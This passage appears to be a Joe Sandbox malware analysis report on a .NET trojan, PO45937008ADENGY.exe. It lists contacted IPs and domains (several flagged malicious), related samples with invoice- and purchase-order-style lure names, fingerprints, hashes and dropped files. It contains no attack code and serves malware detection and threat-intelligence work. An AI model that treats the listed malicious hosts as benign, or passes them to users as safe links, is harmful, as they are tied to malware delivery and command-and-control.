                                                                                                https://www.belatopapparel.xyz/mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=Fzfm3a0XdlsnDkSWJpXlhrCLV6cUJcC1/JgJIwlanext.exe, 00000011.00000002.915820348.0000000003FB2000.00000004.00000001.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-1996194PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s220b/0_GettyImages-1231353837PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s458/0_GettyImages-1302496803.PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                unknown
URL | Source | Malicious | Antivirus Detection | Reputation
http://www.goodfont.co.kr | explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
https://felix.data.tm-awx.com/ampconfig.json" | PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s615/0_GettyImages-1273716690. | PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s270b/0_Salah-Pressing.jpg | PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s615/0_Salah-Goal-vs-Leeds.jpg | PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-02 | PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s220b/0_RobertsonCross1.jpg | PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
166.62.28.107 | accessibleageing.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true
154.210.110.99 | www.szmsbk.com | Seychelles | 54600 | PEGTECHINCUS | true
123.31.43.181 | tuyensinhhaiphong.com | Viet Nam | 45899 | VNPT-AS-VNVNPTCorpVN | true
172.67.132.70 | www.belatopapparel.xyz | United States | 13335 | CLOUDFLARENETUS | true
172.67.150.212 | myliverpoolnews.cf | United States | 13335 | CLOUDFLARENETUS | false
3.223.115.185 | HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | United States | 14618 | AMAZON-AESUS | false
81.88.57.70 | onstatic-pt.setupdns.net | Italy | 39729 | REGISTER-ASIT | true
198.185.159.144 | ext-sq.squarespace.com | United States | 53831 | SQUARESPACEUS | false
34.102.136.180 | helpmewithmyenergy.com | United States | 15169 | GOOGLEUS | false
185.199.108.153 | pradnyanamaya.github.io | Netherlands | 54113 | FASTLYUS | true
85.17.172.1 | thelandcle.com | Netherlands | 60781 | LEASEWEB-NL-AMS-01NetherlandsNL | true
104.21.56.119 | unknown | United States | 13335 | CLOUDFLARENETUS | false
52.15.160.167 | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | United States | 16509 | AMAZON-02US | false

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 383974
Start date: 08.04.2021
Start time: 13:29:16
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 13m 15s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: PO45937008ADENGY.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 31
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@17/5@16/13
EGA Information: Failed
HDC Information:
• Successful, ratio: 22% (good quality ratio 19.5%)
• Quality average: 72.2%
• Quality standard deviation: 32.3%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 13.88.21.125, 20.82.209.183, 204.79.197.200, 13.107.21.200, 23.54.113.53, 13.64.90.137, 104.43.139.144, 52.255.188.83, 52.147.198.201, 20.82.210.154, 23.10.249.43, 23.10.249.26, 23.0.174.185, 23.0.174.200, 52.155.217.156, 20.54.26.129, 20.50.102.62
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time | Type | Description
13:30:32 | API Interceptor | 1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match: 172.67.150.212
Associated Sample Name / URL | Detection | Context
Confirmed order#PR2100906.pdf.exe | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-B91C17FBCEF934B51AF8A5C483F6B4AB.html
08042021New-PurchaseOrder.exe | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5183A347C7BAD04E3424599E1B978F29.html
ETL_126_072_60.doc | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-FC5277A9663FCE09586170F6A51B96A2.html
IMG_102-05_78_6.doc | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-C6853B6BC65431464628FF23B3F0F335.html
ACdEbpiSYO.exe | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-2F0AA6F57E058337CC16810234C2DFDB.html
Invoice_ord00000009.exe | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-8CB85A57C5722245E360D575B497E6CC.html
kayo.exe | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-867E80DBC8FFAEC73AC7FD4FE1DA1A1B.html
new_order20210408_14.doc | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A1DD2EDE961D10CC641FCFA5CF4FBAFC.html
new_order20210408_14.doc | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A1DD2EDE961D10CC641FCFA5CF4FBAFC.html
DHLdocument11022020680908911.exe | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-E073BCECB8DFC74A5738D8B1C32D8436.html
234d9ec1757404f8fd9fbb1089b2e50c08c5119a2c0ab.exe | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-8F0F96D3333F94679C552F5DEB9CE2AF.html
items list.doc | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-2F0AA6F57E058337CC16810234C2DFDB.html
Krishna Gangaa Enviro System Pvt Ltd.exe | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-D1FD69143FEE625518220B28083FA2F9.html
SecuriteInfo.com.Artemis5C44BBDCCDFF.4370.exe | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-09750D54320914EBBBA77235AE2BC46B.html
RFQ #46200058149.exe | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-FE6EFB3AED9F05224C930BEF8BE1CC20.html
Payment Slip E05060_47.doc | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-3764A540BD56887B40989BBA8472B701.html
New Orders.exe | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-28D56F639751140E7A008217BE126C8D.html
DHL_document11022020680908911.exe | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-531418C06045F41752298279414DE528.html
BL8846545545363.exe | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-B7B18D8B53846C51E3D2182818196100.html
BL84995005038483.exe | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-994F3BB06F4A7FE8F60B83F74A076F10.html

Domains

Match: HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com
Associated Sample Name / URL | Detection | Context
LWlcpDjYIQ.exe | malicious | 3.223.115.185
PaymentAdvice.exe | malicious | 3.223.115.185
BL01345678053567.exe | malicious | 3.223.115.185
New Order.exe | malicious | 3.223.115.185
BL84995005038483.exe | malicious | 3.223.115.185
PURCHASE ORDER.exe | malicious | 3.223.115.185
SB210330034.pdf.exe | malicious | 3.223.115.185
YMvYmQQyCz4gkqA.exe | malicious | 3.223.115.185
executable.2772.exe | malicious | 3.223.115.185
onbgX3WswF.exe | malicious | 3.223.115.185
Swift001_jpg.exe | malicious | 3.223.115.185
Scan-45679.exe | malicious | 3.223.115.185
TT Remittance Copy.PDF.exe | malicious | 3.223.115.185
PO-108561.exe | malicious | 3.223.115.185
SWIFT COPY_pdf.exe | malicious | 3.223.115.185
emergency.vbs | malicious | 3.223.115.185
yx8DBT3r5r.exe | malicious | 3.223.115.185
Po # 6-10331.exe | malicious | 3.223.115.185
4849708PO # RMS0001.exe | malicious | 3.223.115.185
order samples 056-062 _pdf.exe | malicious | 3.223.115.185

Match: onstatic-pt.setupdns.net
Associated Sample Name / URL | Detection | Context
BL836477488575.exe | malicious | 81.88.57.70
nxHN51lQwj.exe | malicious | 81.88.57.70
EuDXqof7Tf.exe | malicious | 81.88.57.70
E4AaEjT91C.exe | malicious | 81.88.57.70
swift-copy-pdf.exe | malicious | 81.88.57.70
Inv_9876567.doc | malicious | 81.88.57.70
ORDER.xlsx | malicious | 81.88.57.70
W2Gv3E8qiY.exe | malicious | 81.88.57.70
PRODUCT INQUIRY BNQ1.xlsx | malicious | 81.88.57.70
new file.exe.exe | malicious | 81.88.57.70
R1Sc7jocaM.exe | malicious | 81.88.57.70
BOQ.exe | malicious | 81.88.57.70
                                                                                                www.szmsbk.comBL84995005038483.exeGet hashmaliciousBrowse
                                                                                                • 154.210.110.99

ASN

Match: AS-26496-GO-DADDY-COM-LLCUS
Associated Sample Name / URL | Detection | Context (IP)
RFQ_AP65425652_032421 isu-isu,pdf.exe | malicious | 184.168.131.241
LWlcpDjYIQ.exe | malicious | 184.168.131.241
PaymentAdvice.exe | malicious | 184.168.131.241
invoice.exe | malicious | 184.168.131.241
PO4308.exe | malicious | 184.168.131.241
pumYguna1i.exe | malicious | 184.168.131.241
eQLPRPErea.exe | malicious | 184.168.131.241
vbc.exe | malicious | 107.180.43.16
7AJT9PNmGz.exe | malicious | 184.168.131.241
Revised Invoice No CU 7035.exe | malicious | 184.168.131.241
PaymentAdvice.exe | malicious | 184.168.131.241
PO7321.exe | malicious | 184.168.131.241
TACA20210407.PDF.exe | malicious | 184.168.131.241
PAYMENT ADVICE'.exe | malicious | 43.255.154.56
PO91361.exe | malicious | 184.168.131.241
PURCHASE ORDER.exe | malicious | 184.168.131.241
DHL Shipping Documents.exe | malicious | 184.168.131.241
56_012021.doc | malicious | 198.71.233.47
SAKKAB QUOTATION_REQUEST.exe | malicious | 107.180.4.53
RFQ11_ZIM2021pdf.exe | malicious | 184.168.131.241

Match: PEGTECHINCUS
Associated Sample Name / URL | Detection | Context (IP)
LWlcpDjYIQ.exe | malicious | 108.186.210.142
ALPHA SCIENCE, INC.exe | malicious | 108.186.210.142
PDF NEW P.OJerhWEMSj4RnE4Z.exe | malicious | 104.233.169.166
TSPO0001978-xlxs.exe | malicious | 198.200.61.199
products order pdf.exe | malicious | 107.149.37.159
New _Items.Xlsx.Pdf.exe | malicious | 108.186.194.188
Doc.exe | malicious | 107.149.176.47
PAYMENT UPDATE.jpg.exe | malicious | 107.149.184.107
winlog.exe | malicious | 165.3.28.187
INVOICE CN No 1005911246.exe | malicious | 107.149.184.107
Payment_Advice_P&R_Shanghai_International Trading_citibank.exe | malicious | 165.3.13.232
nxHN51lQwj.exe | malicious | 107.149.205.85
EuDXqof7Tf.exe | malicious | 107.149.205.85
Sales Report.exe | malicious | 107.149.184.107
9j4sD6PmsW.exe | malicious | 104.233.238.207
RFQ 2-16-2021-.exe | malicious | 107.148.215.212
2089876578 87687.xlsx | malicious | 107.148.46.144
INV_TMB_C108976.xlsx | malicious | 107.148.46.144
aywqvkgnkxmwc | malicious | 107.148.210.230
0113 INV_PAK.xlsx | malicious | 198.200.62.230

Match: VNPT-AS-VNVNPTCorpVN
Associated Sample Name / URL | Detection | Context (IP)
8QGglvUeYO.exe | malicious | 103.42.58.103
networkmanager | malicious | 14.188.135.58
WUHU95Apq3 | malicious | 113.183.33.163
G0ESHzsrvg.exe | malicious | 103.255.237.180
6OUYcd3GIs.exe | malicious | 103.255.237.180
http://singaedental.vn/wp-content/lQ/ | malicious | 202.92.7.113
http://covisa.com.br/paypal-closed-y2hir/ABqY1RAPjaNGnFw9flbsTw3mbHnBB1OUWRV6kbbvfAryr4bmEsDoeNMECXf3fg6io/ | malicious | 202.92.7.113
Adjunto_2021.doc | malicious | 202.92.7.113
Dok 0501 012021 Q_93291.doc | malicious | 202.92.7.113
11_extracted.exe | malicious | 103.207.39.131
https://correolimpio.telefonica.es/atp/url-check.php?URL=https%3A%2F%2Fnhabeland.vn%2Fsercurirys%2FRbvPk%2F&D=53616c7465645f5f824c0b393b6f3e2d3c9a50d9826547979a4ceae42fdf4a21ec36a319de1437ef72976b2e7ef710bdb842a205880238cf08cf04b46eccce50114dbc4447f1aa62068b81b9d426da6b&V=1 | malicious | 103.255.237.61
SecuriteInfo.com.ArtemisC5924E341E9E.exe | malicious | 103.255.237.239
INFO 2020 DWP_947297.doc | malicious | 14.177.232.31
MESSAGIO 83-46447904.doc | malicious | 123.31.24.142
Order List and Quantities.ppt | malicious | 103.207.39.131
Purchase list.ppt | malicious | 103.207.39.131
2020141248757837844.ppt | malicious | 103.207.39.131
PurchaseOrder#Q7677.ppt | malicious | 103.207.39.131
Remittance Scan00201207.ppt | malicious | 103.207.39.131
Sgyq1ebjMJ.rtf | malicious | 103.207.38.170

JA3 Fingerprints

Match: 54328bd36c14bd82ddaa0c04b25ed9ad
Associated Sample Name / URL | Detection | Context (IP)
Confirmed order#PR2100906.pdf.exe | malicious | 104.21.56.119
ORDER-02188.exe | malicious | 104.21.56.119
qINcOlwRud.exe | malicious | 104.21.56.119
order-invoice-amazon-#D01-9237793-8041853.DOCX.vbs | malicious | 104.21.56.119
nDHV6wKWHF.exe | malicious | 104.21.56.119
CWlXbVUJab.exe | malicious | 104.21.56.119
08042021New-PurchaseOrder.exe | malicious | 104.21.56.119
MT103_YIU LIAN08042021_Xerox Scan_202104_.exe | malicious | 104.21.56.119
lfQuSBwdSf.exe | malicious | 104.21.56.119
RFQ-034.exe | malicious | 104.21.56.119
ACdEbpiSYO.exe | malicious | 104.21.56.119
PURCHASE ORDER - XIFFA55,pdf.exe | malicious | 104.21.56.119
Invoice_ord00000009.exe | malicious | 104.21.56.119
kayo.exe | malicious | 104.21.56.119
RFQ 100400806 SUPPLY.exe | malicious | 104.21.56.119
new_order20210408_14.doc | malicious | 104.21.56.119
BL01345678053567.exe | malicious | 104.21.56.119
SER09090899.exe | malicious | 104.21.56.119
PURCHASE ORDER-34002174,pdf.exe | malicious | 104.21.56.119
cricket.exe | malicious | 104.21.56.119

                                                                                                Dropped Files

                                                                                                No context

                                                                                                Created / dropped Files

                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_PO45937008ADENGY_548b4085ddbf64917cc844f65c389b6b83a46a9_884555ad_06e94ec9\Report.wer
                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):17294
                                                                                                Entropy (8bit):3.767947348427798
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:HKV78LF+mHBUZMXyaKQqueZito/u7szS274Ithkf:UQLFPBUZMXyaFmX/u7szX4Itha
                                                                                                MD5:E1C76C8B43DC5BEE59EF7DB41A77E71C
                                                                                                SHA1:69C4E4EA4C5792AA9FBFC734F07A3F7D92224F4E
                                                                                                SHA-256:446B3BB058FF814A8E0448DD98080FF207F1F8BE128E218159B101EC075C72C4
                                                                                                SHA-512:5FEDA9FFFE17BBCD8D666A86CDF8525141B7A74109BAD278CB12E9857E1BCF4F0B1D190D0ADCFFDA08E50ABD377E22A07125BD6ABA274559BD2EDE6E9E810CB4
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.2.3.5.5.0.1.8.0.0.9.9.3.1.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.2.3.5.5.0.2.9.7.5.9.9.0.6.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.1.e.4.7.c.0.8.-.8.5.f.8.-.4.e.c.4.-.8.1.3.2.-.b.1.e.4.9.2.f.9.c.4.3.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.a.2.4.7.1.9.b.-.4.4.3.b.-.4.b.1.e.-.a.0.6.a.-.d.a.0.b.3.1.0.1.6.a.d.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.O.4.5.9.3.7.0.0.8.A.D.E.N.G.Y...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.D.i.m.b.o.n.o...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.7.0.-.0.0.0.1.-.0.0.1.b.-.8.0.6.9.-.3.e.8.5.6.a.2.c.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.4.9.0.5.2.9.4.d.a.f.2.3.9.d.d.6.1.4.2.d.1.0.9.e.1.c.d.0.1.f.b.0.0.0.0.0.0.0.0.!.0.0.0.0.a.9.0.9.7.0.3.5.9.d.a.1.6.d.f.b.c.f.8.9.6.4.8.f.7.a.3.8.
                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER15F6.tmp.dmp
                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                File Type:Mini DuMP crash report, 15 streams, Thu Apr 8 11:30:23 2021, 0x1205a4 type
                                                                                                Category:dropped
                                                                                                Size (bytes):329043
                                                                                                Entropy (8bit):3.5814895039261643
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:DoFNFT0j0Dxvljd+p7fORF07KYDnNH9gIOgF5cOun0t5eUCgUv7A0Cdg40U:DwNw01ip7AFk/H9RpDUcMTjjNm
                                                                                                MD5:C28730DB7F8DF42E74ADDA955E7931BA
                                                                                                SHA1:F1666C053F14566908BBF5819FE0D045C40C1B1A
                                                                                                SHA-256:E7118229511BB2A090078BCD88996CA660834521461170E76D96694CC7F184E5
                                                                                                SHA-512:195C6A3952DDAD44C2299A3F2AC27D1DECAB9AD0FB361FCD2239FFB92E78617846449D8C64948540CEBFA2B1787678BB6F46C3E7C4F0BA39C0024F3494814B3A
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview: MDMP....... .......O.n`...................U...........B.......0......GenuineIntelW...........T.......p...<.n`.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER3111.tmp.WERInternalMetadata.xml
                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8426
                                                                                                Entropy (8bit):3.700862223926201
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:Rrl7r3GLNi7y6R5E6YrlSU73MgmfZgS0n+prI89bzAsfbxm:RrlsNiO6s6YJSUAgmf6S0GzTfA
                                                                                                MD5:14C5D7D9ABD410AA9D5F4290CC86AA9B
                                                                                                SHA1:77E8181D0E5B328A19AC54DA632DDA06E5A8A4AB
                                                                                                SHA-256:5603FE1DCBE969C1D9B95DA2EB13C9267B04B3AB3DF764B306B321FC5AB8EAB6
                                                                                                SHA-512:FDABCEAE22E2DA11F4022A57F91167045256009132B22D423BDD78A88FAF5556B9D4BA57832ED8FA01889F22BB4BD711171B54512F4D5C6AE9ACDFE8BFA9B9BB
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER3400.tmp.xml
                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):4781
                                                                                                Entropy (8bit):4.503466224775152
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:cvIwSD8zsDUJgtWI9QidWSC8BiS8fm8M4Jw7oQFFDd+q8v2Qww5ERXbzXEdd:uITfDSesSNAHJw7oqdK2qERXPXEdd
                                                                                                MD5:B5612F197E49BE0F5539E39D980A3325
                                                                                                SHA1:C963DDFEAAD554375CC0552E3A6AE0DF7D4254AC
                                                                                                SHA-256:AC003F7CB91F18065FA391B83977D00D29315BF18E5C2655C51C79784C789CD8
                                                                                                SHA-512:3E2AFCD84558EE7327867D3B8E1669BF57B9D48BE16BF4A80539EE61C0C3EF4B5DA9B2AD2844E4F8C61E69DF80EC2CD450DE6FFC902EC967AFE7930D0B7FE4EF
                                                                                                Malicious:false
                                                                                                Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="937241" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                C:\Users\user\IAHRsWbfqoM
                                                                                                Process:C:\Users\user\Desktop\PO45937008ADENGY.exe
                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):786426
                                                                                                Entropy (8bit):3.089624181395092
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:orDKSioZviCYjg+qGUFDA3l4bdIfWHmasNlTNr7WAei8rsOHBTL6LH78yqmkEqbv:oPysC8bi8
                                                                                                MD5:DF29A18D25AEB7C389776487B272C582
                                                                                                SHA1:EDC75070262B9F3E05B461CDCF0F09F3239006CF
                                                                                                SHA-256:1DDF2DC28689AAFA46287B55234B85977203E1F3F06AA2B370EA9E91C1B28B4B
                                                                                                SHA-512:51038E8C1A9D140275A27E5B192A716EABF50317DD8FFA979DEE7758210E24D99A67E03BE74825E9BDE4370123AD7372DD722C71996A4E823E3F237B4FFA408B
                                                                                                Malicious:false

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Entropy (8bit):4.784778244670397
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                File name:PO45937008ADENGY.exe
                                                                                                File size:112640
                                                                                                MD5:47ebf3893d8d6db4add1b87ad75495e4
                                                                                                SHA1:a90970359da16dfbcf89648f7a38fb75707181b3
                                                                                                SHA256:ee54b187c42f159bfba469c4b8c5ba0a85afeb802ea7eacaf400ccb38f7183af
                                                                                                SHA512:af3761d653503d2a4875297ff883d1e2a6114a8fbb77123929f1f7c4c1c974e7939d0382fdee8b01a80de5c0fa6edbe7c730ad17230d4f3fd100357c0166705c
                                                                                                SSDEEP:1536:yTlD/rTfbpANPKlHbP+x8sri5UE8QVeP2tALz/4PJNTLQJC4jPri+ZfUd37NWDeC:yTlD/rTfbpANPy50i/ayS
                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............~.... ........@.. ....................... .......n....@................................

                                                                                                File Icon

                                                                                                Icon Hash:fae2d8f4f0d8d2c4

                                                                                                Static PE Info

                                                                                                General

                                                                                                Entrypoint:0x40c27e
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:true
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
